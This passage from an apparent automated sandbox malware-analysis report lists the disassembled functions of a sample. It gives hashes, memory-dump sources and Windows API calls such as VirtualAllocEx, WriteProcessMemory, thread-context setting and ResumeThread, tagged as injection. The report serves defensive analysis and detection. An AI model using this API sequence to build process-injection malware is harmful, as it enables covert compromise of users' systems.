                              Function 076D1C40 Relevance: 2.9, Strings: 2, Instructions: 390COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Hcq$Hcq
                              • API String ID: 0-4088181183
                              • Opcode ID: 1afca1228b7088891fff9f4e7945bdb87d3544308a91040aa1776251725f07c1
                              • Instruction ID: 374cec3525b45857e785705220f22675247186788a58b7717e3b4cbcddd76bf8
                              • Opcode Fuzzy Hash: 1afca1228b7088891fff9f4e7945bdb87d3544308a91040aa1776251725f07c1
                              • Instruction Fuzzy Hash: ACD1D571F102158FCB09FBB8D89956DBBB6BFC8210F458869D989E7340DE389C46C366
                              Function 012CB088 Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4'_q$Xcq
                              • API String ID: 0-55182120
                              • Opcode ID: 03057aa79842edc06b132cdf2ad562753f0bacdcaff15d81a507668f4f0d7172
                              • Instruction ID: 4d46d9379cc2472e23928267b42adeabf645a15eeac2a2a1ef5d3ac6e4ba4b15
                              • Opcode Fuzzy Hash: 03057aa79842edc06b132cdf2ad562753f0bacdcaff15d81a507668f4f0d7172
                              • Instruction Fuzzy Hash: 68415B31E143599FCB05AF7CE85929D7BB6AF95310F1485AEC105CB3E5EB304E0A8792
                              Function 012C1FE3 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Hcq$Hcq
                              • API String ID: 0-4088181183
                              • Opcode ID: b4d521e23d39270b967a2c203d96de01b0b700f67b3694db269d986fe06b3f9b
                              • Instruction ID: 2179da61dc29a00c805fdf4248f3b5ccdcaa8278c837888f4639701099b35203
                              • Opcode Fuzzy Hash: b4d521e23d39270b967a2c203d96de01b0b700f67b3694db269d986fe06b3f9b
                              • Instruction Fuzzy Hash: D7817C30B10219DFDB19AF68C858BAE7BA6BFC8700F14852DE6169B295CF709D41CB91
                              Function 012C26D8 Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: ,cq$,cq
                              • API String ID: 0-2927840315
                              • Opcode ID: 74762eaf3ba14a78b811b72361765f9dd4bcd9584a96631e2ef26566bf2b8f6f
                              • Instruction ID: cf9ff9e8222dc01f4bced22aa5d7541fd036b93d81e7a52a73de36010507af0e
                              • Opcode Fuzzy Hash: 74762eaf3ba14a78b811b72361765f9dd4bcd9584a96631e2ef26566bf2b8f6f
                              • Instruction Fuzzy Hash: A2718634A2010ACFDB18CF6DC4889AABBB6BF89B10B15876DD71597365CF31D841CB60
                              Function 012C0DA0 Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8cq$8cq
                              • API String ID: 0-1115341050
                              • Opcode ID: 5dd1691763da757bb5d7f9fdda703d006c543ed3e5020068ac2ef019eb2f5fa2
                              • Instruction ID: e056efc2c4e602a3f715da13c60a645e13cf399e41b30f902b3b982f78ce9637
                              • Opcode Fuzzy Hash: 5dd1691763da757bb5d7f9fdda703d006c543ed3e5020068ac2ef019eb2f5fa2
                              • Instruction Fuzzy Hash: A231CF34B403019FEB18AB359C58B7A3BE2AF88A10F14457DFA06CB3E4DE318C028B50
                              Function 012C7FF0 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: $_q$$_q
                              • API String ID: 0-458585787
                              • Opcode ID: f0714ab810c653a8748bc5193ae9eeb05fea7bc1eebe981ba8b218db730fc2fc
                              • Instruction ID: fb91058936b342fa27a7722516859cc8370e696c538a0517e9c17600eed08e71
                              • Opcode Fuzzy Hash: f0714ab810c653a8748bc5193ae9eeb05fea7bc1eebe981ba8b218db730fc2fc
                              • Instruction Fuzzy Hash: 8C31FC303246468FDB2A9B39C85463E7BA5FF44F00F14C95ED362CB296DA65CC80C751
                              Function 076D2DA0 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: TJdq$Te_q
                              • API String ID: 0-3934155944
                              • Opcode ID: 3627d63e84783d6faa0fe3f05837d1b5eaa94bc74a5f66e5086dcce1642c70d4
                              • Instruction ID: ce626f78881370ed0f8660c6b7bfe313ebdcde9d1793d818aae43ab02cacb36e
                              • Opcode Fuzzy Hash: 3627d63e84783d6faa0fe3f05837d1b5eaa94bc74a5f66e5086dcce1642c70d4
                              • Instruction Fuzzy Hash: 92F096717100215FCA08A77DA458A3E76EFAFCDA24715405DE50ACB3A1CE61DD068396
                              Function 076D0196 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te_q
                              • API String ID: 0-823545363
                              • Opcode ID: 9c1415aade3a9133017c41642e2be0742a3ead241478930039ceb30b7edd157d
                              • Instruction ID: 38b49175f22f27987bfd8cebb5bc5b259d1927548451d8f29c02f80d7262ef57
                              • Opcode Fuzzy Hash: 9c1415aade3a9133017c41642e2be0742a3ead241478930039ceb30b7edd157d
                              • Instruction Fuzzy Hash: 1552B130E102258BC754FBB8D89975DBBB6EF84200F4185A9D88DE7251EF389C89CB52
                              Function 05811793 Relevance: 1.8, APIs: 1, Instructions: 345COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1775188451.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5810000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0f42d0a4e9edc353ccc7645f8dbb29451094c8818b224a1a6538c53f738cfbc7
                              • Instruction ID: 17552b03740417c9b16dadb625af1d4bc1b5a6d91b90099f3daab2acd7e5c656
                              • Opcode Fuzzy Hash: 0f42d0a4e9edc353ccc7645f8dbb29451094c8818b224a1a6538c53f738cfbc7
                              • Instruction Fuzzy Hash: 1BA17C71D093889FDB12CFA9C849989BFB5FF0A300F19809AED44EB262D7359C46CB55
                              Function 076D3510 Relevance: 1.7, Strings: 1, Instructions: 497COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 43`q
                              • API String ID: 0-987742510
                              • Opcode ID: cbb1a039aca01ff50e41e6e00240af1fc530f6994d021336f7e3aafeeb9bd74e
                              • Instruction ID: 277f423a879eef4c07d4659bc6e86ef9b120ad385048ccab24dbee90f2c4e6e1
                              • Opcode Fuzzy Hash: cbb1a039aca01ff50e41e6e00240af1fc530f6994d021336f7e3aafeeb9bd74e
                              • Instruction Fuzzy Hash: 0CF1A331F10225CBDB04BFBED89965DBBB6BF84204F418929D88AE7344EF385C468756
                              Function 0778B88F Relevance: 1.7, APIs: 1, Instructions: 207memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 0778B92B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 7935809352303b1ca9b14aae7e51705fb8beb05ccb0e513dad41b17185c78f8d
                              • Instruction ID: 80927ee7c279cddeadc5fbbdc54e906a633af93ece370ac98a1e15a82ac3f099
                              • Opcode Fuzzy Hash: 7935809352303b1ca9b14aae7e51705fb8beb05ccb0e513dad41b17185c78f8d
                              • Instruction Fuzzy Hash: 82514EF74D06689FC784EE59E8442DABFE4EB096B0F20803FE8149B231C2306595AFD1
                              Function 0575ACA8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1774812422.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5750000_file.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 8b9512110adba9e5ff62bbcd4148bfb75cfa0c73effb3c524cfca783f6395889
                              • Instruction ID: 6e63b56abdda0eeb2dbafb0e3a0c39c7bd90487c6e5c11552e139d81d51630a0
                              • Opcode Fuzzy Hash: 8b9512110adba9e5ff62bbcd4148bfb75cfa0c73effb3c524cfca783f6395889
                              • Instruction Fuzzy Hash: 718147B0A00B058FDB64DF2AD44475ABBF1FF88311F008A2DD88ADBA50DB75E945DB90
                              Function 076D3500 Relevance: 1.7, Strings: 1, Instructions: 416COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 43`q
                              • API String ID: 0-987742510
                              • Opcode ID: c5751a88453c78c75be3b5fa866489c504b4c19663fb38badc75633a4db4245e
                              • Instruction ID: e211ca0696aebfb717a8015f04c20c72396cdc49c26a0d2b5e7f063b1a348f66
                              • Opcode Fuzzy Hash: c5751a88453c78c75be3b5fa866489c504b4c19663fb38badc75633a4db4245e
                              • Instruction Fuzzy Hash: 57E1B471F10325CBCB04BBBAD89965DBBB6BF88204F418529D84AE7341EE385C46CB56
                              Function 058118F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                              Download Yara Rule
                              APIs
                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05811A02
                              Memory Dump Source
                              • Source File: 00000000.00000002.1775188451.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5810000_file.jbxd
                              Similarity
                              • API ID: CreateWindow
                              • String ID:
                              • API String ID: 716092398-0
                              • Opcode ID: 1ee989ab586e0a8c323511db763926fabdec3002c3d0a28701df3ec5ae8c3271
                              • Instruction ID: 6febe457c8ad7136b977f6b6b18333bd55e2c11e4d0a9754f2fac7b59c2be2fe
                              • Opcode Fuzzy Hash: 1ee989ab586e0a8c323511db763926fabdec3002c3d0a28701df3ec5ae8c3271
                              • Instruction Fuzzy Hash: 5D41CEB1D00349DFDB14CF9AC984ADEBFB5BF88310F24812AE919AB210D7759985CF94
                              Function 05813EDE Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                              Download Yara Rule
                              APIs
                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05813F71
                              Memory Dump Source
                              • Source File: 00000000.00000002.1775188451.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5810000_file.jbxd
                              Similarity
                              • API ID: CallProcWindow
                              • String ID:
                              • API String ID: 2714655100-0
                              • Opcode ID: b1e308483bd4e4534aac771ab0777293537d8b4cf810bc79a2cde59566efeb15
                              • Instruction ID: f95e1b239b036bd81a42a4494bceb83fc6ee830ac92aba36f584dab5d1808cb6
                              • Opcode Fuzzy Hash: b1e308483bd4e4534aac771ab0777293537d8b4cf810bc79a2cde59566efeb15
                              • Instruction Fuzzy Hash: 2731E8B5A00305DFDB14CF95C448AAABBF5FF88314F24C859E919AB321D775A845CFA0
                              Function 076DEBEC Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4'_q
                              • API String ID: 0-2033115326
                              • Opcode ID: ca969b45c31874b4ba99b62162deb84e2fb5fee1c34a071fd18d41e4219047dc
                              • Instruction ID: e331ad7fb2c23b2a08fb85b870a3d0fd91ada6996c6ac2ffb22d5bf01e5323c7
                              • Opcode Fuzzy Hash: ca969b45c31874b4ba99b62162deb84e2fb5fee1c34a071fd18d41e4219047dc
                              • Instruction Fuzzy Hash: FBB15870F142168FC704FBB9D86466E7BF2AF85204F448469D85AEB385DA3C9C07C752
                              Function 07B4CE60 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                              Download Yara Rule
                              APIs
                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07B4CEF0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: 0a2e5ec5c30ea742c245f1561cef6aa3ce3a4ff78799f8a38092dca4e031b84e
                              • Instruction ID: 0216b5f8e60cf0e4db7b14209cd9586531106b049b0466029dd28788a6ae023e
                              • Opcode Fuzzy Hash: 0a2e5ec5c30ea742c245f1561cef6aa3ce3a4ff78799f8a38092dca4e031b84e
                              • Instruction Fuzzy Hash: 55212AB1D003599FDB10CFAAC8457EEBBF5FF48310F108429E919A7240D7789945DBA4
                              Function 0575D578 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                              Download Yara Rule
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0575D546,?,?,?,?,?), ref: 0575D607
                              Memory Dump Source
                              • Source File: 00000000.00000002.1774812422.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5750000_file.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: cf19155747f9f071bac02c9818fcdb3e7a69ffc65562d3db47c7f8a4f9119def
                              • Instruction ID: 31934524a7b9740ce11de14280493197a0326a46c02c8879eb88f42c889767dd
                              • Opcode Fuzzy Hash: cf19155747f9f071bac02c9818fcdb3e7a69ffc65562d3db47c7f8a4f9119def
                              • Instruction Fuzzy Hash: A721E5B5900248AFDB10CF9AD584ADEBBF5FB48320F14841AE919B3310D379AA45DFA5
                              Function 0575B690 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                              Download Yara Rule
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0575D546,?,?,?,?,?), ref: 0575D607
                              Memory Dump Source
                              • Source File: 00000000.00000002.1774812422.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5750000_file.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: c936e4417577b98976aea28be31d122c6ce2706da94c4e2b9dfc9ab166f0b45a
                              • Instruction ID: 0ff15e5caa0dc8b14efb0a488c20397fa06832afe0f130f452f0e69dcbcb1a32
                              • Opcode Fuzzy Hash: c936e4417577b98976aea28be31d122c6ce2706da94c4e2b9dfc9ab166f0b45a
                              • Instruction Fuzzy Hash: D821E6B5D00248EFDB10CF9AD584ADEBBF5FB48320F14801AE919A3310D374AA54DFA5
                              Function 07B4C438 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                              Download Yara Rule
                              APIs
                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 07B4C4B6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 4f5e41c420e1e2abf07ea8409e0caa88c78c2cda9a6d8096b13ba1987e92b453
                              • Instruction ID: ce47c1786b1fc79607e4c9ba220cae4326368a52b343816b9a1bcd75bc3853cb
                              • Opcode Fuzzy Hash: 4f5e41c420e1e2abf07ea8409e0caa88c78c2cda9a6d8096b13ba1987e92b453
                              • Instruction Fuzzy Hash: 6C2138B1D003099FDB10DFAAC5857EEBFF5EF48324F50842AD819A7240D7789A45CBA5
                              Function 07B4D850 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                              Download Yara Rule
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B4D8CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: fc60753a1d4025a03ecb7fb3929a1f5c8b52dc2653f16f8ee81d616f70e3f486
                              • Instruction ID: 3d6ace1898bf76c545c1aca657b5b085fbbe5dc765795e5c11bcb67186f92f25
                              • Opcode Fuzzy Hash: fc60753a1d4025a03ecb7fb3929a1f5c8b52dc2653f16f8ee81d616f70e3f486
                              • Instruction Fuzzy Hash: AF213AB1D003099FDB10DFAAC4857EEBBF4EF88314F148429D519A7240D7789945DFA5
                              Function 07B4D5B0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 07B4D627
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 49c9484e886746980f6759935658f55114f60a6ac2cbe0fb9d9ce634fa4c2a00
                              • Instruction ID: d0d3713f03a9e080ba710d4ca7982b05b91c40c365e1af5e63b2275c32c08c71
                              • Opcode Fuzzy Hash: 49c9484e886746980f6759935658f55114f60a6ac2cbe0fb9d9ce634fa4c2a00
                              • Instruction Fuzzy Hash: 572149B1D002099FDB10DFAAC445AEEFBF4EF48320F10842AE919A7250C7389945DFA1
                              Function 07B43262 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 07B432DB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: aea319cef4087031fb05eb72e13972061351e06a90fe09572e66cc1b10bb6c03
                              • Instruction ID: 896140917111937fab87f4bbd7dc3b1bd304aa81bce1e12bd74b4c8970394f4f
                              • Opcode Fuzzy Hash: aea319cef4087031fb05eb72e13972061351e06a90fe09572e66cc1b10bb6c03
                              • Instruction Fuzzy Hash: 3A2110B6D002499FCB10CF9AC584BDEBBF4AF48320F14846AE858A7250D378A644DFA1
                              Function 05EDC978 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                              Download Yara Rule
                              APIs
                              • GetLongPathNameW.KERNEL32(00000000), ref: 05EDC9E8
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776300472.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5ed0000_file.jbxd
                              Similarity
                              • API ID: LongNamePath
                              • String ID:
                              • API String ID: 82841172-0
                              • Opcode ID: b9995f65e76f557e8aef82d37ac76c55071ab3a5f78633cd26b7e4753d95785b
                              • Instruction ID: 3b5adc3345f3703ee714e2ed48371b948ad1e8537560c3e54bf8aac6c691e183
                              • Opcode Fuzzy Hash: b9995f65e76f557e8aef82d37ac76c55071ab3a5f78633cd26b7e4753d95785b
                              • Instruction Fuzzy Hash: 6A1147B1C0065A9BCB10CF9AC5457AEFBF4FF48320F20812AD859B7240D738A945CFA5
                              Function 07B43268 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 07B432DB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 2304a55861a9ba1150bb565c81b8884d8b5a1dbdcdeabf37a59d6bb93cd5b1f1
                              • Instruction ID: f9bcf5bff142f48486a483678dada5ea24cf72b1ab967e7c892b21e4f7d5bfd5
                              • Opcode Fuzzy Hash: 2304a55861a9ba1150bb565c81b8884d8b5a1dbdcdeabf37a59d6bb93cd5b1f1
                              • Instruction Fuzzy Hash: 192103B1D002499FDB10CF9AC584ADEFBF4EF48320F108429E858A3250D378AA44DFA1
                              Function 0778B8B8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 0778B92B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 9129a2371c313c33cbb7dbd0078df3b15977820c62a5f91c7bfc0e83eb8c5bed
                              • Instruction ID: 45856aee219d65b03bd7e1762c996ebc3099564cfb01514b77b2787e1e6c50e1
                              • Opcode Fuzzy Hash: 9129a2371c313c33cbb7dbd0078df3b15977820c62a5f91c7bfc0e83eb8c5bed
                              • Instruction Fuzzy Hash: 6E21D3B5D002599FCB50DF9AC584AEEFBF4FF48320F108429E959A7250D378AA44CFA5
                              Function 07B4CB20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07B4CB8E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 8dbede49573f38498604b8757cffbb7fbbbea7792e56e1d8b9c9e427c3483298
                              • Instruction ID: b25b93974e99c4199edeb6365b48caf49a8a3a62a05c3379afed18594a523a32
                              • Opcode Fuzzy Hash: 8dbede49573f38498604b8757cffbb7fbbbea7792e56e1d8b9c9e427c3483298
                              • Instruction Fuzzy Hash: 6D116AB19002499FDB10DFAAC845ADFFFF5EF48310F108419E919A7250C7359940DFA0
                              Function 0575A004 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0575ACC4), ref: 0575AEFE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1774812422.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5750000_file.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 52bb019601adfcaddf098caa7c97850142d53d3ad5ed273133a0a6eca915ecf6
                              • Instruction ID: 3a7865a462b625fea1c8f6c760d42523644a41ecd4bd6197b0dd13748a83b23b
                              • Opcode Fuzzy Hash: 52bb019601adfcaddf098caa7c97850142d53d3ad5ed273133a0a6eca915ecf6
                              • Instruction Fuzzy Hash: 071102B6D043498FDB10CF9AC444A9EFBF4EB88325F10856AD819B7210D3B9A545CFA1
                              Function 07B4DAB8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: e8aa8e785d19138bb8c96b45b82f0da81cf5640a75da6298666588a1eecdac9e
                              • Instruction ID: 625f6488d373045f5b2304bf47ba6d965e917de91b8fff3ba228b8640db70d9f
                              • Opcode Fuzzy Hash: e8aa8e785d19138bb8c96b45b82f0da81cf5640a75da6298666588a1eecdac9e
                              • Instruction Fuzzy Hash: AE1166B1E003498FDB20DFAAC4457EEFBF4EF88324F208419D519A7240CB39A945CBA4
                              Function 07B4B2F8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                              Download Yara Rule
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B4DFB5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: c9446245c60f94012720d88c8a08141dbb6f523d27cfbee7bf0b6b6c8e5a30ce
                              • Instruction ID: 6b650d06a5909988296d9bdab9cd49e6dad8be784ae58315b4c1bfb956c57302
                              • Opcode Fuzzy Hash: c9446245c60f94012720d88c8a08141dbb6f523d27cfbee7bf0b6b6c8e5a30ce
                              • Instruction Fuzzy Hash: 4F1122B59003489FDB20CF9AC588BEEBBF8EB48310F108859E918A3200C374A944CFA1
                              Function 012C6D43 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: PH_q
                              • API String ID: 0-2397113591
                              • Opcode ID: 08a33e1c4589ba59d8a4e8a6935aeeb6e5ab7216ecf7d2f173b163679e574437
                              • Instruction ID: 891a298eeefd6c15cd3d21f058e9a0733df24b0b278dc28d7b620568f1602f6b
